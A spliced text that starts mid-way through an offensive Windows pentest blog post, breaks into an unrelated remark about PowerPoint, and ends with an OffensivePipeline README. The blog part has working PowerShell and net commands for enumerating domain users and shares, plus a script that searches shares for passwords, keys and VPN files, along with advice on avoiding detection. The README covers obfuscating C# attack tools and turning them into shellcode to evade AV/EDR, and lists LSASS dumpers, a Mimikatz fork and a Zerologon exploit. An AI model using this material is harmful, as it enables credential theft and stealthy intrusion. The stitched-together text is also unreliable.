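    $keywordClause = ($Keywords | ForEach-Object { "(description=*$_*)" }) -join ''
    $ldapFilter = "(&(objectCategory=person)(objectClass=user)(|$prefixClause$keywordClause" +
                  "(userAccountControl:1.2.840.113556.1.4.803:=32)))"

    $searcher = [adsisearcher]$ldapFilter
    $searcher.PageSize = 500   # paged results, so large domains are not cut off at the 1000-entry limit
    $searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName', 'description', 'userAccountControl', 'memberOf', 'pwdLastSet'))

    foreach ($r in $searcher.FindAll()) {
        $p   = $r.Properties
        $uac = [int]($p['userAccountControl'] | Select-Object -First 1)
        $pls = [int64]($p['pwdLastSet'] | Select-Object -First 1)
        $pwdDate = if ($pls -gt 0) { [datetime]::FromFileTimeUtc($pls) } else { $null }
        [pscustomobject]@{
            Account      = [string]($p['sAMAccountName'] | Select-Object -First 1)
            Description  = [string]($p['description'] | Select-Object -First 1)
            PasswdNotReq = [bool]($uac -band 0x20)
            Disabled     = [bool]($uac -band 0x2)
            PwdLastSet   = $pwdDate
            # memberOf holds DNs; keep only the CN so the table stays readable.
            Groups       = @($p['memberOf'] | ForEach-Object { (($_ -split ',')[0]) -replace '^CN=' })
        }
    }
}

# Read-only LDAP queries; nothing is written to the directory.
Find-InterestingDomainUsers |
    Sort-Object PasswdNotReq -Descending |
    Format-Table Account, PasswdNotReq, Disabled, PwdLastSet, Description -AutoSize
```

A single paged LDAP search is quieter than dozens of net.exe invocations, but it is still visible to LDAP query logging on the domain controller, so run it once and keep the results in your notes rather than repeating it.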
Shares
Shares are often overlooked by beginners, and that is a common mistake. A share is a place where valuable things get stored. At first glance it may look like a pile of junk: unnecessary files and clutter. That is often true, since shares tend to be full of paperwork and bureaucratic documents. But among that clutter we regularly find useful IT data: passwords, VPN configurations, network maps and similar items. Documents owned by assistants deserve the same attention. Assistants manage things for their directors, so their folders often hold the directors' private information, passwords and emails. Here is how you list the shares hosted on your own machine:
PS > net share
Remote shares can also be listed:
PS > net view \\computer /ALL
Enumerating every share in the domain generates a lot of noise. It can be done when you have no clear picture of the hosts, but we do not recommend it. If the host names already tell you their purpose, for example "DB" or "BACKUP", further enumeration is unnecessary. Going deeper can get you caught, even on a small or poorly managed network. If you decide to do it anyway, this lists all shares in the domain:
PS > net view /all /domain[:domainname]
Interesting shares can be mounted for detailed searching:
PS > net use x: \\computer\share
You can search through documents in a share using specific keywords:
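As an added example (not code from the original post), the function below does the keyword search over a mounted share with two constraints that keep it fast and quiet: only document-like extensions are opened, and files above a size ceiling are skipped. Formats that cannot be grepped (KeePass databases, RDP and OpenVPN profiles, Office documents) are reported by name alone. The drive letter, extension list and keywords are assumptions; the hit is reported as file, line number and a trimmed excerpt rather than the whole file.

```powershell
# Added example, not part of the original post: keyword search across a share
# mounted with 'net use' (or a UNC path). Extensions, keywords and the X: path
# are assumptions; adjust them to the environment.

function Search-ShareDocuments {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string[]] $Keywords   = @('password', 'passwd', 'pwd', 'credential', 'vpn', 'secret', 'BEGIN RSA'),
        [string[]] $Extensions = @('*.txt', '*.ini', '*.cfg', '*.conf', '*.xml', '*.json', '*.ps1', '*.bat',
                                   '*.cmd', '*.vbs', '*.csv', '*.kdbx', '*.rdp', '*.ovpn', '*.docx', '*.xlsx'),
        [int]      $MaxSizeMB  = 5
    )
    # Escape the keywords so a literal like 'BEGIN RSA' is matched as typed.
    $pattern = ($Keywords | ForEach-Object { [regex]::Escape($_) }) -join '|'
    $files = Get-ChildItem -Path $Path -Recurse -File -Include $Extensions -ErrorAction SilentlyContinue |
             Where-Object Length -le ($MaxSizeMB * 1MB)

    foreach ($f in $files) {
        # Binary or zipped formats: the file itself is the finding, do not grep it.
        if ($f.Extension -in '.kdbx', '.rdp', '.ovpn', '.docx', '.xlsx') {
            [pscustomobject]@{ File = $f.FullName; Line = 0; Match = '(file type of interest)' }
            continue
        }
        Select-String -Path $f.FullName -Pattern $pattern -ErrorAction SilentlyContinue |
            ForEach-Object {
                $excerpt = $_.Line.Trim()
                if ($excerpt.Length -gt 120) { $excerpt = $excerpt.Substring(0, 120) + '...' }
                [pscustomobject]@{ File = $_.Path; Line = $_.LineNumber; Match = $excerpt }
            }
    }
}

# X: is the drive mapped above with 'net use x: \\computer\share'.
Search-ShareDocuments -Path 'X:\' | Format-Table -AutoSize
```

Remember that the mapping itself is an artefact: remove it with net use x: /delete when you are done, and keep the hits in your notes rather than in a file on the target.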
That's it for Part 1 of the Survival Series. We're excited to keep this going, showing you different ways to work with systems even when you're limited in what you can do. Sure, the commands you have are restricted, but survival sometimes means taking risks. If you play it too safe, you might get stuck and have no way forward. Time can work against you, and making bold moves at the right moment can pay off.
The goal of this series is to help you get comfortable with the Windows tools you have at your disposal for recon and pentesting. There will be times when you don't have much, and you'll need to make the most of what's available.
In Part 2, we'll go deeper, looking at host inspections, DC queries, and the Active Directory modules that can give you even more insight. Having these native tools makes it easier to stay under the radar, even when things are going smoothly. As you get more experience, you'll find that relying on built-in tools is often the simplest, most reliable way to get the job done.
Normal people prepare presentations in PowerPoint (or LibreOffice Impress or Google Slides), but it's boring. I mean, presentations are generally boring and should only be a background for a speaker, and making them in software like PowerPoint makes them even worse (too many options to distract the creator from focusing on the content). Great
OffensivePipeline allows you to download and build C# tools, applying certain modifications in order to improve their evasion for Red Team exercises. A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the resulting binary and generate a shellcode.
Features
Currently only supports C# (.Net Framework) projects
Allows to clone public and private (you will need credentials :D) git repositories
Allows to work with local folders
Randomizes project GUIDs
Randomizes application information contained in AssemblyInfo
Builds C# projects
Obfuscates generated binaries
Generates shellcodes from binaries
There are 79 tools parameterised in YML templates (not all of them may work :D)
New tools can be added using YML templates
It should be easy to add new plugins...
What's new in version 2.0
Almost complete code rewrite (new bugs?)
Cloning from private repositories possible (authentication via GitHub authToken)
Possibility to copy a local folder instead of cloning from a remote repository
RandomGuid: randomise the GUID in .sln, .csproj and AssemblyInfo.cs files
RandomAssemblyInfo: randomise the values defined in AssemblyInfo.cs
BuildCsharp: build c# project
ConfuserEx: obfuscate c# tools
Donut: use Donut to generate shellcodes. The shellcode generated is without parameters, in future releases this may be changed.
Add a tool from a remote git
The scripts for downloading the tools are in the Tools folder in yml format. New tools can be added by creating new yml files with the following format:
Rubeus.yml file:
tool:
  - name: Rubeus
    description: Rubeus is a C# toolset for raw Kerberos interaction and abuses
    gitLink: https://github.com/GhostPack/Rubeus
    solutionPath: Rubeus\Rubeus.sln
    language: c#
    plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
    authUser:
    authToken:
Where:
Name: name of the tool
Description: tool description
GitLink: link from git to clone
SolutionPath: solution (sln file) path
Language: language used (currently only c# is supported)
Plugins: plugins to use on this tool build process
AuthUser: user name from github (not used for public repositories)
AuthToken: auth token from github (not used for public repositories)
tool:
  - name: SeatbeltLocal
    description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
    gitLink: C:\Users\alpha\Desktop\SeatbeltLocal
    solutionPath: SeatbeltLocal\Seatbelt.sln
    language: c#
    plugins: RandomGuid, RandomAssemblyInfo, BuildCsharp, ConfuserEx, Donut
    authUser:
    authToken:
Where:
Name: name of the tool
Description: tool description
GitLink: path where the tool is located
SolutionPath: solution (sln file) path
Language: language used (currently only c# is supported)
Plugins: plugins to use on this tool build process
AuthUser: user name from github (not used for local repositories)
AuthToken: auth token from github (not used for local repositories)
Requirements for the release version (Visual Studio 2019/2022 is not required)
Description: A tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts (PetitPotam) and relaying it to the certificate service.
Description: This modified fork of SafetyKatz dynamically fetches the latest pre-compiled release of Mimikatz directly from the gentilkiwi GitHub repo, runtime patching on detected signatures and uses SharpSploit DInvoke to get it into memory.
Description: Enumerate Domain Data is designed to be similar to PowerView but in .NET. PowerView is essentially the ultimate domain enumeration tool, and we wanted a .NET implementation that we worked on ourselves. This tool was largely put together by viewing implementations of different functionality across a wide range of existing projects and combining them into EDD.
Description: PurpleSharp is an open source adversary simulation tool written in C# that executes adversary techniques within Windows Active Directory environments
Description: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.
Description: SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract
Description: SharpCloud is a simple C# utility for checking for the existence of credential files related to Amazon Web Services, Microsoft Azure, and Google Compute.
Description: SharpDir is a simple code set to search both local and remote file systems for files using the same SMB process as dir.exe, which uses TCP port 445
Description: Checks running processes, process metadata, Dlls loaded into your current process and each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.
Description: SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
Description: This project reuses open handles to lsass to parse or minidump lsass, therefore you don't need to use your own lsass handle to interact with it. (Dinvoke-version)
Description: This executable is made to be executed within Cobalt Strike session using execute-assembly. It will retrieve the LAPS password from the Active Directory.
Description: Create a minidump of the LSASS process from memory (Windows 10 - Windows Server 2016). The entire process uses dynamic API calls, direct syscall and Native API unhooking to evade the AV / EDR detection.
Description: This project is a C# tool to use Pass-the-Hash for authentication on a local Named Pipe for user Impersonation. You need a local administrator or SEImpersonate rights to use this.
Description: SharpReg is a simple code set to interact with the Remote Registry service API using the same SMB process as reg.exe, which uses TCP port 445
Description: SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr, formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI.
Description: SharpSpray is a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike.
Description: SharpSvc is a simple code set to interact with the SC Manager API using the same DCERPC process as sc.exe, which opens with TCP port 135 and is followed by the use of an ephemeral TCP port.
Description: SharpTask is a simple code set to interact with the Task Scheduler service API using the same DCERPC process as schtasks.exe, which opens with TCP port 135 and is followed by the use of an ephemeral TCP port.
Description: An exploit for CVE-2020-1472, a.k.a. Zerologon. This tool exploits a cryptographic vulnerability in Netlogon to achieve authentication bypass.
Description: While Sysmon's driver can be renamed at installation, it is always loaded at altitude 385201. The objective of this tool is to challenge the assumption that our defensive tools are always collecting events.
Description: Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly, but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment).
Description: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the target account.